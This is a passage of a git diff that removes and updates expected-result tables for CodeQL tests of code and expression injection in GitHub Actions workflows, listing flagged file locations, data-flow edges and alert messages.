.github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | +| action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected deleted file mode 100644 index 697cf2a310e8..000000000000 --- a/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected +++ /dev/null @@ -1,14 +0,0 @@ -edges -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | -nodes -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | -subpaths -#select -| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref b/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref deleted file mode 100644 index 05ef02c50948..000000000000 --- a/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/CriticalCodeInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref deleted file mode 100644 index 1745587e534a..000000000000 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/CriticalExpressionInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected deleted file mode 100644 index f852a1b59815..000000000000 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ /dev/null @@ -1,276 +0,0 @@ -edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | -| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | -| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | -| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | -| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | -| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | -| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | -| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | -| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | -| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | -| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | -| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | -| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | -| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | -| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | -| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | -| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | -| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | -| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | -| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | -| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | -| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | -| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | -| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | -| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | -| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | -| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | -| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | -| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | -| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | -| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | -| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | -| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | -| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | -| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | -| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | -| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | -nodes -| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | -| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | -| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | -| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | -| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | -| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | semmle.label | env.pr_message | -| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | -| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | semmle.label | github.event.pages[1].title | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | semmle.label | github.event.pages[11].title | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | semmle.label | github.event.pages[0].page_name | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | semmle.label | github.event.pages[2222].page_name | -| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | semmle.label | Run Step: extract-url [initial_url] | -| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | -| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | semmle.label | steps.extract-url.outputs.initial_url | -| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | -| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | semmle.label | steps.curl.outputs.redirected_url | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | semmle.label | steps.trim-url.outputs.trimmed_url | -| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | -| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | -| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | -| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | -| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | semmle.label | env.global_env | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | -| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | semmle.label | github.event.review.body | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | semmle.label | github.head_ref | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | semmle.label | github.event.commits[11].message | -| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | semmle.label | github.event.commits[11].author.email | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | semmle.label | github.event.commits[11].author.name | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | semmle.label | github.event.head_commit.author.email | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | semmle.label | github.event.head_commit.author.name | -| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | semmle.label | github.event.head_commit.committer.email | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | -| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | -| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | -| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | -| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | -| .github/workflows/simple1.yml:11:20:11:58 | 